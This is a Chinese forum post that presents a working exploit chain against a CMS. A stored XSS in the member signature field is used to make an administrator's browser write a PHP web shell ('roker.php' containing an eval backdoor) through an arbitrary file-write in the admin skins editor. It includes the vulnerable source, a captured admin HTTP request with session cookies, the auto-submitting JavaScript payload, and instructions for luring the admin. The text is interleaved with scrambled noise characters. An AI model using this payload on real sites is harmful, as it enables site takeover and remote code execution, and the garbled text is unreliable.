|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
4 U' N2 P" }) e官网已经修补了,所以重新下了源码
' H2 y* W5 I% P因为 后台登入 还需要认证码 所以 注入就没看了。
; [! o5 z2 s, l2 d$ p% b. `存在 xss
+ B V, ~9 h; k( i漏洞文件 user/member/skin_edit.php
6 n u( D+ z# i* O本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
$ @: v9 x9 Z5 G0 r: g6 R5 k" Y0 t 9 a o x* I4 U
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
: n5 \9 {" @4 B1 r3 R* [
Q( W* w. m& O$ R& m+ ^! b' B" t</textarea></td></tr>
2 z2 N( @7 O0 l" H - A" J4 x2 B* d5 f8 j" j, B* g' R
user/do.php
" K0 {' t) J7 Z3 G8 C3 s' e3 i! ]3 f; p4 }
8 Q9 E$ O0 z3 a
if($op=='zl'){ //资料/ v' g7 ]2 c3 {" X8 R- {
$ G4 ~9 ^" q, g6 O" B" [
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 4 h9 b8 @0 n/ x3 u- M- z- ?
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));% V+ G( S1 K; }
3 ^' W( f4 H* a8 @- N7 l3 u $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, b' D `% X' ]6 V - W s; A% e: K/ Q7 a
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
) k( J3 I& `7 }" b( }4 \& h where CS_Name='".$cscms_name."'";6 V/ D7 u2 |1 B! `5 R. M
" l% v# q1 z- g! K
if($db->query($sql)){& B5 R7 e: w' H) ]
1 @* t3 e' H2 i3 A9 \ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
) p( E$ y% |# W% @6 V. c6 H / O* a' r: j0 M& [ G. m
}else{0 o1 ^+ X, E7 _
5 g+ Y& o. N' ]# o/ h4 K8 F# P: P9 ^
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
/ V3 e. e" X, e" s- t" _; Y. T
1 A u# B* Q1 I, o, o0 P% n8 e7 Y }& @& \7 J7 U, n& r
$ f" h) d' U e% [6 e( T8 Y# {1 _
% Z8 m6 w, }) }( e# C
没有 过滤导致xss产生。5 s7 t8 p; P- B
后台 看了下 很奇葩的是可以写任意格式文件。。; L" Z( @- I& a) r! G
抓包。。5 E) ~/ B/ {5 g' v2 ~5 i3 }
h7 L" B/ z3 s; \8 D1 p, \
- y8 u9 r6 a& c* I8 p本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1) f5 H6 c9 M- _7 N8 [+ t6 ^
$ g9 a3 T. Z) G! `' ~% `
Accept: text/html, application/xhtml+xml, */*: ?8 b) v0 I* l2 |: ]9 Z/ m: i
! }% J0 K, T" ?
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
/ ?( P8 S+ m- w- f8 D $ L3 U+ ]7 g7 q& p$ ^& ~
Accept-Language: zh-CN
+ U+ w7 v3 F; Y) a6 d 0 r6 w& \! _* y+ f2 F7 O6 V$ j9 @
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)# J6 j# {, N+ G
; b7 ?6 v/ }- T0 t7 ^Content-Type: application/x-www-form-urlencoded! F( T. F2 P4 q& ]% L
! s. w2 H& _ s9 q
Accept-Encoding: gzip, deflate! f1 P6 R- i2 E0 ~( f* q( x1 }5 J
# L3 q# w! l) q) i
Host: 127.0.0.1
9 t5 F9 @: N+ a/ E / [2 b F7 S1 F! f1 ?5 J
Content-Length: 38, T( y4 _# K# |) P+ h& h! x5 k
, i& T* c; m1 K
DNT: 1+ v& ^9 t$ i( o; P
# ~) K% ]1 K* M) J* V' bConnection: Keep-Alive
' h7 X6 q$ V9 M0 B* J. _3 z 0 X% B( L) g7 G7 V
Cache-Control: no-cache* s9 O; T9 \- ^( `$ `3 F
# y4 m# h- l1 O0 O! u
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
0 C7 J# l( A* u! l
3 o* l" d( W v
3 L! B6 ]+ d* j6 n/ B0 t8 V1 Z) uname=aaa.php&content=%3Cs%3E%3Ca%25%3E: T4 f5 b3 ^4 m. E
- v% g+ g% n* O9 k6 V) L) g4 Q) M
6 n/ ^0 U4 l& s: _7 q' R' q8 _. b
( [/ Y$ b1 G7 l* k于是 构造js如下。% C7 O; ]# b5 u& C5 _; |4 D
- A9 c# o7 w" _ K) E, z
本帖隐藏的内容<script> ( I1 C! Y D3 k2 N
thisTHost = top.location.hostname;6 L& j+ C6 Z+ Y4 F$ W
1 `9 E2 g% r2 b+ y8 u
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";" r: D3 P* ?& z$ d
- Z. l9 a9 D/ m& @; e2 I: J" @function PostSubmit(url, data, msg) { 8 S1 N0 j1 q9 M) e
var postUrl = url;0 f, x- X$ h1 |4 T. ]2 @% Z' j
1 F Y# L5 l v: E var postData = data;
) M b) s, V: w2 [ var msgData = msg; i' p7 ]( b9 g- b8 s
var ExportForm = document.createElement("FORM"); 2 R' l8 |8 Q. U/ r- q0 r, r, F
document.body.appendChild(ExportForm);
3 ?7 S i5 U K/ Z3 Z& O- P" ]4 W ExportForm.method = "POST"; & q) C9 M' }) [- G, w3 }
var newElement = document.createElement("input");
4 U, [. b% [ }* j9 I% E newElement.setAttribute("name", "name"); 8 j8 O) D% d& `9 ?; b
newElement.setAttribute("type", "hidden"); / P. v+ ?# K# u: Y$ B6 D3 n5 L
var newElement2 = document.createElement("input");
' ]9 a6 o7 c: b/ \ w8 f; ` newElement2.setAttribute("name", "content");
( y4 q& T7 I1 N E9 b newElement2.setAttribute("type", "hidden");
! J! T$ m8 P( o A! p1 \0 q9 k ExportForm.appendChild(newElement);
! u2 f% T+ M) T; O3 q) Z" i ExportForm.appendChild(newElement2);
) a) |' L% v/ ? K I/ A, d newElement.value = postData; 9 `( V# [: G% Z8 G
newElement2.value = msgData;
( a1 P4 j" Z# Y- p: U! n8 @- i ExportForm.action = postUrl; ) i8 s+ r/ H" Y1 X3 ^# q
ExportForm.submit();
+ j% f/ C% f. m; k};
. A2 d. Q( P9 ^5 C
W" X+ ^5 u# W$ |7 P6 {+ Y/ QPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");/ a" F% G. a" c$ D
8 W' w6 r! h8 L3 l; x' {' T
</script>
! ~ u# F0 L# w
, F; b, {& b3 }0 m t& z$ r& o8 Y# j6 o, R5 N
% x, Z1 q1 Z+ Thttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, g; e/ G# E$ d' Q6 E( p+ k用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)- V5 C& e) r" m4 {6 A1 _
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
* j3 D( n2 x, N8 n* V: p
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对